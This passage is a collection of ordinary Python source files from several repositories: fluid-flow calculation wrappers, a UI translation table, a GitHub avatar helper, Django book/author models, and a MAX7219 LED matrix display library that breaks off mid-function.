output = comp.Muller(SG, Tavg, mu, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# The answer has an imaginary part; raise an exception
raise Exception
return output
def fluids_IGT(SG, Tavg, mu, L=None, D=None, P1=None, P2=None, Q=None,
Ts=288.7, Ps=101325.0, Zavg=1, E=1):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the IGT formula.
'''
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.IGT(SG, Tavg, mu, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# The answer has an imaginary part; raise an exception
raise Exception
return output
def fluids_isothermal_gas(rho, f, P1=None, P2=None, L=None, D=None, m=None):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline for the complete isothermal flow equation.
m mass flow
'''
check = [L, D, P1, P2, m]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.isothermal_gas(rho, f, P1, P2, L, D, m)
if output.imag != 0:
# The answer has an imaginary part; raise an exception
raise Exception
return output
def fluids_isothermal_work_compression(P1, P2, T, Z=1):
'''
Calculates the work of compression or expansion of a gas going through
an isothermal process.
'''
return comp.isothermal_work_compression(P1, P2, T, Z)
def fluids_polytropic_exponent(k, n=None, eta_p=None):
'''
Calculates either the polytropic exponent from polytropic efficiency
or polytropic efficiency from the polytropic exponent.
Returns isentropic exponent or polytropic efficiency, depending on input.
'''
inp = [n, eta_p]
unknowns = inp.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.polytropic_exponent(k, n, eta_p)
return output
def fluids_isentropic_work_compression(T1, k, Z=1, P1=None, P2=None, W=None,
eta=None):
'''
Calculation function for dealing with compressing or expanding a gas going
through an isentropic, adiabatic process assuming constant Cp and Cv.
The polytropic model is the same equation; just provide n instead of k and
use a polytropic efficiency for eta instead of an isentropic efficiency.
Can calculate any of the following, given all the other inputs:
W, Work of compression
P2, Pressure after compression
P1, Pressure before compression
eta, isentropic efficiency of compression
'''
inp = [P1, P2, W, eta]
unknowns = inp.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.isentropic_work_compression(T1, k, Z, P1, P2, W, eta)
return output
def fluids_isentropic_efficiency(P1, P2, k, eta_s=None, eta_p=None):
'''
Calculates either isentropic or polytropic efficiency from the other
type of efficiency. (isentropic or polytropic)
'''
inp = [eta_s, eta_p]
unknowns = inp.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.isentropic_efficiency(P1, P2, k, eta_s, eta_p)
return output
def fluids_isentropic_T_rise_compression(T1, P1, P2, k, eta=1):
'''
Calculates the increase in temperature of a fluid which is compressed or
expanded under isentropic, adiabatic conditions assuming constant Cp and Cv.
The polytropic model is the same equation; just provide n instead of k and
use a polytropic efficiency for eta instead of an isentropic efficiency.
'''
return comp.isentropic_T_rise_compression(T1, P1, P2, k, eta)
def fluids_T_critical_flow(T, k):
'''
Calculates critical flow temperature Tcf for a fluid with the given
isentropic coefficient. Tcf is in a flow (with Ma=1) whose stagnation
conditions are known. Normally used with converging/diverging nozzles.
Parameters:
T : float
Stagnation temperature of a fluid with Ma=1 [K]
k : float
Isentropic coefficient []
Returns:
Tcf : float
Critical flow temperature at Ma=1 [K]
'''
return comp.T_critical_flow(T, k)
def fluids_P_critical_flow(P, k):
'''
Calculates critical flow pressure Pcf for a fluid with the given
isentropic coefficient. Pcf is in a flow (with Ma=1) whose stagnation
conditions are known. Normally used with converging/diverging nozzles.
Parameters:
P : float
Stagnation pressure of a fluid with Ma=1 [Pa]
k : float
Isentropic coefficient []
Returns:
Pcf : float
Critical flow pressure at Ma=1 [Pa]
'''
return comp.P_critical_flow(P, k)
def fluids_P_isothermal_critical_flow(P, fd, D, L):
'''
Calculates critical flow pressure Pcf for a fluid flowing isothermally and
suffering pressure drop caused by a pipe’s friction factor.
Parameters:
P : float
Inlet pressure [Pa]
fd : float
Darcy friction factor for flow in pipe [-]
L : float, optional
Length of pipe, [m]
D : float, optional
Diameter of pipe, [m]
'''
return comp.P_isothermal_critical_flow(P, fd, D, L)
def fluids_is_critical_flow(P1, P2, k):
'''
Determines if a flow of a fluid driven by pressure gradient P1 - P2 is
critical, for a fluid with the given isentropic coefficient. This function
calculates critical flow pressure, and checks if this is larger than P2.
If so, the flow is critical and choked.
'''
return comp.is_critical_flow(P1, P2, k)
def fluids_stagnation_energy(V):
'''
Calculates the increase in enthalpy dH which is provided by a fluid’s velocity V.
Parameters:
V : float
Velocity [m/s]
Returns:
dH : float
Incease in enthalpy [J/kg]
'''
return comp.stagnation_energy(V)
def fluids_P_stagnation(P, T, Tst, k):
'''
Calculates stagnation flow pressure Pst for a fluid with the given
isentropic coefficient and specified stagnation temperature and normal
temperature. Normally used with converging/diverging nozzles.
Parameters:
P : float
Normal pressure of a fluid [Pa]
T : float
Normal temperature of a fluid [K]
Tst : float
Stagnation temperature of a fluid moving at a certain velocity [K]
k : float
Isentropic coefficient []
Returns:
Pst : float
Stagnation pressure of a fluid moving at a certain velocity [Pa]
'''
return comp.P_stagnation(P, T, Tst, k)  # delegate to fluids; returning this wrapper itself would recurse forever
def fluids_T_stagnation(T, P, Pst, k):
'''
Calculates stagnation flow temperature Tst for a fluid with the given
isentropic coefficient and specified stagnation pressure and normal
pressure. Normally used with converging/diverging nozzles.
Parameters:
T : float
Normal temperature of a fluid [K]
P : float
Normal pressure of a fluid [Pa]
Pst : float
Stagnation pressure of a fluid moving at a certain velocity [Pa]
k : float
Isentropic coefficient []
Returns:
Tst : float
Stagnation temperature of a fluid moving at a certain velocity [K]
'''
return comp.T_stagnation(T, P, Pst, k)
def fluids_T_stagnation_ideal(T, V, Cp):
'''
Calculates the ideal stagnation temperature Tst calculated assuming the
fluid has a constant heat capacity Cp and with a specified velocity V and
tempeature T.
Parameters:
T : float
Temperature [K]
V : float
Velocity [m/s]
Cp : float
Ideal heat capacity [J/kg/K]
Returns:
Tst : float
Stagnation temperature [J/kg]
'''
return comp.T_stagnation_ideal(T, V, Cp)
```
#### File: jon85p/pyENL/translations.py
```python
def translations(lang='en'):
'''
Returns a dictionary with the translations of each string.
'''
dicc_gen = {}
# For each text option shown to the user, add an entry to the general
# dictionary; each dictionary value is another dictionary whose keys are
# the language codes and whose values are the corresponding translations.
# TODO: translation of exceptions
idiomas = ['es', 'en', 'pt', 'fr']
if lang not in idiomas:
raise Exception('Language not listed; check the options.')
dicc_gen['Resolver'] = {'es': 'Resolver', 'en': 'Solve', 'pt': 'Resolver',
'fr': 'Resolver'}
dicc_gen['Ecuaciones'] = {'es': 'Ecuaciones', 'en': 'Equations',
'pt': 'Ecuaciones', 'fr': 'Ecuaciones'}
dicc_gen['Actualizar'] = {'es': 'Actualizar', 'en': 'Update',
'pt': 'Actualizar', 'fr': 'Actualizar'}
dicc_gen['Limpiar'] = {'es': 'Limpiar', 'en': 'Clear', 'pt': 'Limpiar',
'fr': 'Limpiar'}
dicc_gen['Variables'] = {'es': 'Variables', 'en': 'Variables',
'pt': 'Variables', 'fr': 'Variables'}
dicc_gen['Información'] = {'es': 'Información', 'en': 'Information',
'pt': 'Información', 'fr': 'Información'}
dicc_gen['Soluciones'] = {'es': 'Soluciones', 'en': 'Solutions',
'pt': 'Soluciones', 'fr': 'Soluciones'}
dicc_gen['Residuos'] = {'es': 'Residuos', 'en': 'Residual',
'pt': 'Residuos', 'fr': 'Residuos'}
dicc_gen['x Ecuaciones/y Variables'] = {'es': 'x Ecuaciones/y Variables', 'en': 'x Ecuaciones/y Variables',
'pt': 'x Ecuaciones/y Variables', 'fr': 'x Ecuaciones/y Variables'}
dicc_gen['Archivo'] = {'es': 'Archivo', 'en': 'File',
'pt': 'Archivo', 'fr': 'Archivo'}
dicc_gen['Exportar reporte'] = {'es': 'Exportar reporte', 'en': 'Export report',
'pt': 'Exportar reporte', 'fr': 'Exportar reporte'}
dicc_gen['Importar'] = {'es': 'Importar', 'en': 'Import',
'pt': 'Importar', 'fr': 'Importar'}
dicc_gen['Editar'] = {'es': 'Editar', 'en': 'Edit',
'pt': 'Editar', 'fr': 'Editar'}
dicc_gen['Opciones'] = {'es': 'Opciones', 'en': 'Options',
'pt': 'Opciones', 'fr': 'Opciones'}
dicc_gen['Herramientas'] = {'es': 'Herramientas', 'en': 'Tools',
'pt': 'Herramientas', 'fr': 'Herramientas'}
dicc_gen['Funciones Ingeniería'] = {'es': 'Funciones Ingeniería', 'en': 'Engineering Functions',
'pt': 'Funciones Ingeniería', 'fr': 'Funciones Ingeniería'}
dicc_gen['Funciones de usuario'] = {'es': 'Funciones de usuario', 'en': 'User functions',
'pt': 'Funciones de usuario', 'fr': 'Funciones de usuario'}
dicc_gen['Ayuda'] = {'es': 'Ayuda', 'en': 'Help',
'pt': 'Ayuda', 'fr': 'Ayuda'}
dicc_gen['Abrir'] = {'es': 'Abrir', 'en': 'Open',
'pt': 'Abrir', 'fr': 'Abrir'}
dicc_gen['Guardar'] = {'es': 'Guardar', 'en': 'Save',
'pt': 'Guardar', 'fr': 'Guardar'}
dicc_gen['Guardar Como...'] = {'es': 'Guardar Como...', 'en': 'Save as...',
'pt': 'Guardar Como...', 'fr': 'Guardar Como...'}
dicc_gen['Cerrar'] = {'es': 'Cerrar', 'en': 'Close',
'pt': 'Cerrar', 'fr': 'Cerrar'}
dicc_gen['Salir'] = {'es': 'Salir', 'en': 'Exit',
'pt': 'Salir', 'fr': 'Salir'}
dicc_gen['Seleccionar todo'] = {'es': 'Seleccionar todo', 'en': 'Select all',
'pt': 'Seleccionar todo', 'fr': 'Seleccionar todo'}
dicc_gen['Deshacer'] = {'es': 'Deshacer', 'en': 'Undo',
'pt': 'Deshacer', 'fr': 'Deshacer'}
dicc_gen['Rehacer'] = {'es': 'Rehacer', 'en': 'Redo',
'pt': 'Rehacer', 'fr': 'Rehacer'}
dicc_gen['Copiar'] = {'es': 'Copiar', 'en': 'Copy',
'pt': 'Copiar', 'fr': 'Copiar'}
dicc_gen['Cortar'] = {'es': 'Cortar', 'en': 'Cut',
'pt': 'Cortar', 'fr': 'Cortar'}
dicc_gen['Pegar'] = {'es': 'Pegar', 'en': 'Paste',
'pt': 'Pegar', 'fr': 'Pegar'}
dicc_gen['Ayuda pyENL'] = {'es': 'Ayuda pyENL', 'en': 'pyENL Help',
'pt': 'Ayuda pyENL', 'fr': 'Ayuda pyENL'}
dicc_gen['Ayuda NumPy'] = {'es': 'Ayuda NumPy', 'en': 'NumPy Help',
'pt': 'Ayuda NumPy', 'fr': 'Ayuda NumPy'}
dicc_gen['Ayuda CoolProp'] = {'es': 'Ayuda CoolProp', 'en': 'CoolProp Help',
'pt': 'Ayuda CoolProp', 'fr': 'Ayuda CoolProp'}
dicc_gen['Sobre pyENL'] = {'es': 'Sobre pyENL', 'en': 'About pyENL',
'pt': 'Sobre pyENL', 'fr': 'Sobre pyENL'}
dicc_gen['Licencias'] = {'es': 'Licencias', 'en': 'Licences',
'pt': 'Licencias', 'fr': 'Licencias'}
dicc_gen['Termodinámicas'] = {'es': 'Termodinámicas', 'en': 'Thermodynamical',
'pt': 'Termodinámicas', 'fr': 'Termodinámicas'}
dicc_gen['Por agregar...'] = {'es': 'Por agregar...', 'en': 'TODO',
'pt': 'Por agregar...', 'fr': 'Por agregar...'}
dicc_gen['Disponibles'] = {'es': 'Disponibles', 'en': 'Availables',
'pt': 'Disponibles', 'fr': 'Disponibles'}
dicc_gen['Agregar...'] = {'es': 'Agregar...', 'en': 'TODO...',
'pt': 'Agregar...', 'fr': 'Agregar...'}
dicc_gen['Comentario'] = {'es': 'Comentario', 'en': 'Comment',
'pt': 'Comentario', 'fr': 'Comentario'}
dicc_gen['Unidades'] = {'es': 'Unidades', 'en': 'Units',
'pt': 'Unidades', 'fr': 'Unidades'}
dicc_gen['Configuración'] = {'es': 'Configuración', 'en': 'Settings',
'pt': 'Configuración', 'fr': 'Configuración'}
dicc_gen['Imprimir'] = {'es': 'Imprimir', 'en': 'Print',
'pt': 'Imprimir', 'fr': 'Imprimir'}
dicc_gen['Open Document Text'] = {'es': 'Open Document Text', 'en': 'Open Document Text',
'pt': 'Open Document Text', 'fr': 'Open Document Text'}
dicc_gen['Archivo LaTeX'] = {'es': 'Archivo LaTeX', 'en': 'LaTeX file',
'pt': 'Archivo LaTeX', 'fr': 'Archivo LaTeX'}
dicc_gen['Archivo EES'] = {'es': 'Archivo EES', 'en': 'EES file',
'pt': 'Archivo EES', 'fr': 'Archivo EES'}
dicc_gen['Solucionado en '] = {'es': 'Solucionado en ', 'en': 'Solved in ',
'pt': 'Información', 'fr': 'Información'}
dicc_gen[' segundos.\nMayor desviación de '] = {'es': ' segundos.\nMayor desviación de ', 'en': ' seconds.\nLargest deviation: ',
'pt': 'Información', 'fr': 'Información'}
dicc_gen['Ecuación'] = {'es': 'Ecuación', 'en': 'Equation',
'pt': 'Información', 'fr': 'Información'}
dicc_gen['Residuo'] = {'es': 'Residuo', 'en': 'Residual',
'pt': 'Información', 'fr': 'Información'}
dicc_gen['Solución'] = {'es': 'Solución', 'en': 'Solution',
'pt': 'Información', 'fr': 'Información'}
dicc_gen['No hubo convergencia a solución...'] = {'es': 'No hubo convergencia a solución...',
'en': 'No convergence to solution...',
'pt': 'No hubo convergencia a solución...',
'fr': 'No hubo convergencia a solución...'}
dicc_gen['Problema'] = {'es': 'Problema', 'en': 'Problem',
'pt': 'Problema', 'fr': 'Problema'}
dicc_gen['Variable'] = {'es': 'Variable', 'en': 'Variable',
'pt': 'Variable', 'fr': 'Variable'}
dicc_gen['Valor Inicial'] = {'es': 'Valor Inicial', 'en': 'Initial Guess',
'pt': 'Valor Inicial', 'fr': 'Valor Inicial'}
dicc_gen['Inferior'] = {'es': 'Inferior', 'en': 'Lower',
'pt': 'Inferior', 'fr': 'Inferior'}
dicc_gen['Superior'] = {'es': 'Superior', 'en': 'Upper',
'pt': 'Superior', 'fr': 'Superior'}
dicc_gen['El número '] = {'es': 'El número ', 'en': 'The number ',
'pt': 'El número ', 'fr': 'El número '}
dicc_gen[' es mayor a '] = {'es': ' es mayor a ', 'en': ' is greater than ',
'pt': ' es mayor a ', 'fr': ' es mayor a '}
dicc_gen[' en la variable '] = {'es': ' en la variable ', 'en': ' in variable ',
'pt': ' en la variable ', 'fr': ' en la variable '}
dicc_gen['El valor inicial de '] = {'es': 'El valor inicial de ', 'en': 'The initial guess of ',
'pt': 'El valor inicial de ', 'fr': 'El valor inicial de '}
dicc_gen[' debe estar entre los dos límites.'] = {'es': ' debe estar entre los dos límites.',
'en': ' must be between the two limits.',
'pt': ' debe estar entre los dos límites.', 'fr': ' debe estar entre los dos límites.'}
dicc_gen[' ecuaciones / '] = {'es': ' ecuaciones / ', 'en': ' equations / ',
'pt': ' ecuaciones / ', 'fr': ' ecuaciones / '}
dicc_gen[' variables'] = {'es': ' variables', 'en': ' variables',
'pt': ' variables', 'fr': ' variables'}
dicc_gen['Error encontrando cantidad de variables y de ecuaciones'] = {'es': 'Error encontrando cantidad de variables y de ecuaciones',
'en': 'Error finding the number of variables and equations',
'pt': 'Error encontrando cantidad de variables y de ecuaciones',
'fr': 'Error encontrando cantidad de variables y de ecuaciones'}
dicc_gen["x Ecuaciones/y Variables"] = {'es': "x Ecuaciones/y Variables", 'en': 'x Equations/y Variables',
'pt': "x Ecuaciones/y Variables", 'fr': "x Ecuaciones/y Variables"}
dicc_gen['Acá va el comentario'] = {'es': 'Acá va el comentario', 'en': 'Comment goes here',
'pt': 'Acá va el comentario', 'fr': 'Acá va el comentario'}
dicc_gen['El documento se ha modificado'] = {'es' : 'El documento se ha modificado',
'en': 'The file was modified',
'pt': 'El archivo ha sido modificado',
'fr': 'El archivo ha sido modificado'}
dicc_gen["¿Desea guardar los cambios?"] = {'es' : '¿Desea guardar los cambios?',
'en': 'Save changes?',
'pt': '¿Desea guardar los cambios?',
'fr': '¿Desea guardar los cambios?'}
dicc_gen["Idioma (requiere reiniciar pyENL)"] = {'es' : "Idioma (requiere reiniciar pyENL)",
'en': 'Language (requires pyENL restart)',
'pt': '"Idioma (requiere reiniciar pyENL)"',
'fr': '"Idioma (requiere reiniciar pyENL)"'}
dicc_gen['Spanish'] = {'es' : 'Español', 'en': 'Spanish',
'pt': 'Espanhol', 'fr': 'Español'}
dicc_gen['English'] = {'es' : 'Inglés', 'en': 'English',
'pt': 'Inglês', 'fr': 'Anglais'}
dicc_gen['French'] = {'es' : 'Francés', 'en': 'French',
'pt': 'Francês', 'fr': 'Français'}
dicc_gen['Portuguese'] = {'es' : 'Portugués', 'en': 'Portuguese',
'pt': 'Portugues', 'fr': 'Portugais'}
dicc_gen['Formato'] = {'es' : 'Formato', 'en': 'Format',
'pt': 'Format', 'fr': 'Format'}
dicc_gen['Interfaz'] = {'es' : 'Interfaz', 'en': 'Interface',
'pt': 'Interface', 'fr': 'Interface'}
dicc_gen['Método'] = {'es' : 'Método', 'en': 'Method',
'pt': 'Method', 'fr': 'Method'}
dicc_gen['Tolerancia'] = {'es' : 'Tolerancia', 'en': 'Tolerance',
'pt': 'Tolerance', 'fr': 'Tolerance'}
dicc_gen['Tiempo máximo de espera en segundos'] = {'es' : 'Tiempo máximo de espera (segundos)', 'en': 'Timeout (seconds)',
'pt': 'Timeout (seconds)', 'fr': 'Timeout (seconds)'}
dicc_gen['Solver'] = {'es' : 'Solucionador', 'en': 'Solver',
'pt': 'Solver', 'fr': 'Solver'}
dicc_gen['Unidades'] = {'es' : 'Unidades', 'en': 'Units',
'pt': 'Units', 'fr': 'Units'}
dicc_gen['Tema'] = {'es' : 'Tema', 'en': 'Theme',
'pt': 'Theme', 'fr': 'Theme'}
dicc_gen['Predeterminado'] = {'es' : 'Predeterminado', 'en': 'Default',
'pt': 'Default', 'fr': 'Default'}
dicc_gen['Fuente'] = {'es' : 'Fuente', 'en': 'Font',
'pt': 'Font', 'fr': 'Font'}
# dicc_gen['Algo'] = {'es' : 'Algo', 'en': 'Something',
# 'pt': 'Alginho', 'fr': 'Algué'}
# Function output
output = {}
for clave in list(dicc_gen.keys()):
output[clave] = (dicc_gen[clave])[lang]
return output
``` |
{
"source": "jona04/libjonatas",
"score": 3
} |
#### File: libjonatas/libjonatas/github_api.py
```python
import requests
def buscar_avatar(usuario):
"""
Fetch a user's avatar on GitHub
:param usuario: str with the user's name
:return: str with the avatar URL
"""
url = f'https://api.github.com/users/{usuario}'  # interpolate the argument instead of a hard-coded user
resp = requests.get(url)
return resp.json()['avatar_url']
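# Usage sketch (requires network access):
#   buscar_avatar('jona04')  # -> e.g. 'https://avatars.githubusercontent.com/u/...'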
```
#### File: libjonatas/spam/db.py
```python
from time import sleep
class Sessao():
contador = 0
usuarios = []
def salvar(self, usuario):
Sessao.contador += 1
usuario.id = Sessao.contador
self.usuarios.append(usuario)
def listar(self):
return self.usuarios
def roll_back(self):
self.usuarios.clear()
def fechar(self):
pass
class Conexao():
def __init__(self):
sleep(1)
def gerar_sessao(self):
return Sessao()
def fechar(self):
pass
``` |
{
"source": "jona04/work-at-olist",
"score": 2
} |
#### File: work-at-olist/library/models.py
```python
from django.db import models
class Author(models.Model):
name = models.CharField('Name', max_length=32)
created_at = models.DateTimeField('Created at', auto_now_add=True, null=True)
uploaded_at = models.DateTimeField('Updated at', auto_now=True, null=True)
def __str__(self):
return self.name
class Meta:
verbose_name = "Author"
verbose_name_plural = "Authors"
ordering = ['-created_at']
class Book(models.Model):
name = models.CharField('Name', max_length=32)
edition = models.IntegerField('Edition')
publication_year = models.IntegerField('Publication Year')
authors = models.ManyToManyField(Author, through='GroupBookAuthor')
created_at = models.DateTimeField('Created at', auto_now_add=True, null=True)
uploaded_at = models.DateTimeField('Updated at', auto_now=True, null=True)
def __str__(self):
return self.name
class Meta:
verbose_name = "Book"
verbose_name_plural = "Books"
ordering = ['-created_at']
class GroupBookAuthor(models.Model):
author = models.ForeignKey(Author, on_delete=models.PROTECT, null=True)
book = models.ForeignKey(Book, on_delete=models.PROTECT, null=True)
def __str__(self):
return str(self.book)
class Meta:
verbose_name = "Group Book Author"
verbose_name_plural = "Group Book Author s"
``` |
{
"source": "JonA1961/MAX7219array",
"score": 3
} |
#### File: JonA1961/MAX7219array/MAX7219array.py
```python
import spidev
import time
from random import randrange
# Note: If any additional fonts are added in MAX7219fonts.py, add them to the import list here:
# Also add them to the section at the end of this script that parses command line arguments
from MAX7219fonts import CP437_FONT, SINCLAIRS_FONT, LCD_FONT, TINY_FONT
# IMPORTANT: User must specify the number of MAX7219 matrices here:
NUM_MATRICES = 8 # Number of separate MAX7219 matrices
# Optional: It is also possible to change the default font for all the library functions:
DEFAULT_FONT = CP437_FONT # Note: some fonts only contain characters in chr(32)-chr(126) range
# ---------------------------------------------------------
# Should not need to change anything below here
# ---------------------------------------------------------
PAD_STRING = " " * NUM_MATRICES # String for trimming text to fit
NO_OP = [0,0] # 'No operation' tuple: 0x00 sent to register MAX_7219_NOOP
MATRICES = range(NUM_MATRICES) # List of available matrices for validation
# Graphics setup
gfx_buffer = []
gfx_rows = range(8)
gfx_columns = range(NUM_MATRICES * 8)
for gfx_col in gfx_columns:
gfx_buffer += [0]
# Registers in the MAX7219 matrix controller (see datasheet)
MAX7219_REG_NOOP = 0x0
MAX7219_REG_DIGIT0 = 0x1
MAX7219_REG_DIGIT1 = 0x2
MAX7219_REG_DIGIT2 = 0x3
MAX7219_REG_DIGIT3 = 0x4
MAX7219_REG_DIGIT4 = 0x5
MAX7219_REG_DIGIT5 = 0x6
MAX7219_REG_DIGIT6 = 0x7
MAX7219_REG_DIGIT7 = 0x8
MAX7219_REG_DECODEMODE = 0x9
MAX7219_REG_INTENSITY = 0xA
MAX7219_REG_SCANLIMIT = 0xB
MAX7219_REG_SHUTDOWN = 0xC
MAX7219_REG_DISPLAYTEST = 0xF
# Scroll & wipe directions, for use as arguments to various library functions
# For ease of use, import the following constants into the main script
DIR_U = 1 # Up
DIR_R = 2 # Right
DIR_D = 4 # Down
DIR_L = 8 # Left
DIR_RU = 3 # Right & up diagonal scrolling for gfx_scroll() function only
DIR_RD = 6 # Right & down diagonal scrolling for gfx_scroll() function only
DIR_LU = 9 # Left & up diagonal scrolling for gfx_scroll() function only
DIR_LD = 12 # Left & down diagonal scrolling for gfx_scroll() function only
DISSOLVE = 16 # Pseudo-random fade transition for wipe_message() function only
GFX_OFF = 0 # Turn the relevant LEDs off, or omit (don't draw) the endpoint of a line
GFX_ON = 1 # Turn the relevant LEDs on, or include (draw) the endpoint of a line
GFX_INVERT = 2 # Invert the state of the relevant LEDs
# Open SPI bus#0 using CS0 (CE0)
spi = spidev.SpiDev()
spi.open(0,0)
# ---------------------------------------
# Library function definitions begin here
# ---------------------------------------
def send_reg_byte(register, data):
# Send one byte of data to one register via SPI port, then raise CS to latch
# Note that subsequent sends will cycle this tuple through to successive MAX7219 chips
spi.xfer([register, data])
def send_bytes(datalist):
# Send sequence of bytes (should be [register,data] tuples) via SPI port, then raise CS
# Included for ease of remembering the syntax rather than the native spidev command, but also to avoid reassigning to 'datalist' argument
spi.xfer2(datalist[:])
def send_matrix_reg_byte(matrix, register, data):
# Send one byte of data to one register in just one MAX7219 without affecting others
if matrix in MATRICES:
padded_data = NO_OP * (NUM_MATRICES - 1 - matrix) + [register, data] + NO_OP * matrix
send_bytes(padded_data)
def send_all_reg_byte(register, data):
# Send the same byte of data to the same register in all of the MAX7219 chips
send_bytes([register, data] * NUM_MATRICES)
def clear(matrix_list):
# Clear one or more specified MAX7219 matrices (argument(s) to be specified as a list even if just one)
for matrix in matrix_list:
if matrix in MATRICES:
for col in range(8):
send_matrix_reg_byte(matrix, col+1, 0)
def clear_all():
# Clear all of the connected MAX7219 matrices
for col in range(8):
send_all_reg_byte(col+1, 0)
def brightness(intensity):
# Set a specified brightness level on all of the connected MAX7219 matrices
# Intensity: 0-15 with 0=dimmest, 15=brightest; in practice the full range does not represent a large difference
intensity = int(max(0, min(15, intensity)))
send_bytes([MAX7219_REG_INTENSITY, intensity] * NUM_MATRICES)
def send_matrix_letter(matrix, char_code, font=DEFAULT_FONT):
# Send one character from the specified font to a specified MAX7219 matrix
if matrix in MATRICES:
for col in range(8):
send_matrix_reg_byte(matrix, col+1, font[char_code % 0x100][col])
def send_matrix_shifted_letter(matrix, curr_code, next_code, progress, direction=DIR_L, font=DEFAULT_FONT):
# Send to one MAX7219 matrix a combination of two specified characters, representing a partially-scrolled position
# progress: 0-7: how many pixels the characters are shifted: 0=curr_code fully displayed; 7=one pixel less than fully shifted to next_code
# With multiple matrices, this function sends many NO_OP tuples, limiting the scrolling speed achievable for a whole line
# scroll_message_horiz() and scroll_message_vert() are more efficient and can scroll a whole line of text faster
curr_char = font[curr_code % 0x100]
next_char = font[next_code % 0x100]
show_char = [0,0,0,0,0,0,0,0]
progress = progress % 8
if matrix in MATRICES:
if direction == DIR_L:
for col in range(8):
if col+progress < 8:
show_char[col] = curr_char[col+progress]
else:
show_char[col] = next_char[col+progress-8]
send_matrix_reg_byte(matrix, col+1, show_char[col])
elif direction == DIR_R:
for col in range(8):
if col >= progress:
show_char[col] = curr_char[col-progress]
else:
show_char[col] = next_char[col-progress+8]
send_matrix_reg_byte(matrix, col+1, show_char[col])
elif direction == DIR_U:
for col in range(8):
show_char[col] = (curr_char[col] >> progress) + (next_char[col] << (8-progress))
send_matrix_reg_byte(matrix, col+1, show_char[col])
elif direction == DIR_D:
for col in range(8):
show_char[col] = (curr_char[col] << progress) + (next_char[col] >> (8-progress))
send_matrix_reg_byte(matrix, col+1, show_char[col])
def static_message(message, font=DEFAULT_FONT):
# Send a stationary text message to the array of MAX7219 matrices
# Message will be truncated from the right to fit the array
message = trim(message)
for matrix in range(NUM_MATRICES-1, -1, -1):
send_matrix_letter(matrix, ord(message[NUM_MATRICES - matrix - 1]), font)
def scroll_message_horiz(message, repeats=0, speed=3, direction=DIR_L, font=DEFAULT_FONT, finish=True):
# Scroll a text message across the array, for a specified (repeats) number of times
# repeats=0 gives indefinite scrolling until script is interrupted
# speed: 0-9 for practical purposes; speed does not have to be integral
# direction: DIR_L or DIR_R only; DIR_U & DIR_D will do nothing
# finish: True/False - True ensures array is clear at end, False ends with the last column of the last character of message
# still displayed on the array - this is included for completeness but rarely likely to be required in practice
# Scrolling starts with message off the RHS(DIR_L)/LHS(DIR_R) of array, and ends with message off the LHS/RHS
# If repeats>1, add space(s) at end of 'message' to separate the end of message & start of its repeat
delay = 0.5 ** speed
if repeats <= 0:
indef = True
else:
indef = False
repeats = int(repeats)
if len(message) < NUM_MATRICES:
message = trim(message)
# Repeatedly scroll the whole message (initially 'front-padded' with blanks) until the last char appears
scroll_text = ""
if direction == DIR_L:
scroll_text = PAD_STRING + message
elif direction == DIR_R:
scroll_text = message + PAD_STRING
counter = repeats
while (counter > 0) or indef:
scroll_text_once(scroll_text, delay, direction, font)
# After the first scroll, replace the blank 'front-padding' with the start of the same message
if counter == repeats:
if direction == DIR_L:
scroll_text = message[-NUM_MATRICES:] + message
elif direction == DIR_R:
scroll_text = message + message[:NUM_MATRICES]
counter -= 1
# To finish, 'end-pad' the message with blanks and scroll the end of the message off the array
if direction == DIR_L:
scroll_text = message[-NUM_MATRICES:] + PAD_STRING
elif direction == DIR_R:
scroll_text = PAD_STRING + message[:NUM_MATRICES]
scroll_text_once(scroll_text, delay, direction, font)
# Above algorithm leaves the last column of the last character displayed on the array, so optionally erase it
if finish:
clear_all()
def scroll_text_once(text, delay, direction, font):
# Subroutine used by scroll_message_horiz(), scrolls text once across the array, starting & ending with text on the array
# Not intended to be used as a user routine; if used, note different syntax: compulsory arguments & requires delay rather than speed
length = len(text) - NUM_MATRICES
start_range = []
if direction == DIR_L:
start_range = range(length)
elif direction == DIR_R:
start_range = range(length-1, -1, -1)
for start_char in start_range:
for stage in range(8):
for col in range(8):
column_data = []
for matrix in range(NUM_MATRICES-1, -1, -1):
if direction == DIR_L:
this_char = font[ord(text[start_char + NUM_MATRICES - matrix - 1])]
next_char = font[ord(text[start_char + NUM_MATRICES - matrix])]
if col+stage < 8:
column_data += [col+1, this_char[col+stage]]
else:
column_data += [col+1, next_char[col+stage-8]]
elif direction == DIR_R:
this_char = font[ord(text[start_char + NUM_MATRICES - matrix])]
next_char = font[ord(text[start_char + NUM_MATRICES - matrix - 1])]
if col >= stage:
column_data += [col+1, this_char[col-stage]]
else:
column_data += [col+1, next_char[col-stage+8]]
send_bytes(column_data)
time.sleep(delay)
def scroll_message_vert(old_message, new_message, speed=3, direction=DIR_U, font=DEFAULT_FONT, finish=True):
# Transitions vertically between two different (truncated if necessary) text messages
# speed: 0-9 for practical purposes; speed does not have to be integral
# direction: DIR_U or DIR_D only; DIR_L & DIR_R will do nothing
# finish: True/False : True completely displays new_message at end, False leaves the transition one pixel short
# False should be used to ensure smooth scrolling if another vertical scroll is to follow immediately
delay = 0.5 ** speed
old_message = trim(old_message)
new_message = trim(new_message)
for stage in range(8):
for col in range(8):
column_data=[]
for matrix in range(NUM_MATRICES-1, -1, -1):
this_char = font[ord(old_message[NUM_MATRICES - matrix - 1])]
next_char = font[ord(new_message[NUM_MATRICES - matrix - 1])]
scrolled_char = [0,0,0,0,0,0,0,0]
if direction == DIR_U:
scrolled_char[col] = (this_char[col] >> stage) + (next_char[col] << (8-stage))
elif direction == DIR_D:
scrolled_char[col] = (this_char[col] << stage) + (next_char[col] >> (8-stage))
column_data += [col+1, scrolled_char[col]]
send_bytes(column_data)
time.sleep(delay)
# above algorithm finishes one shift before fully displaying new_message, so optionally complete the display
if finish:
static_message(new_message)
def wipe_message(old_message, new_message, speed=3, transition=DISSOLVE, font=DEFAULT_FONT):
# Transition from one message (truncated if necessary) to another by a 'wipe' or 'dissolve'
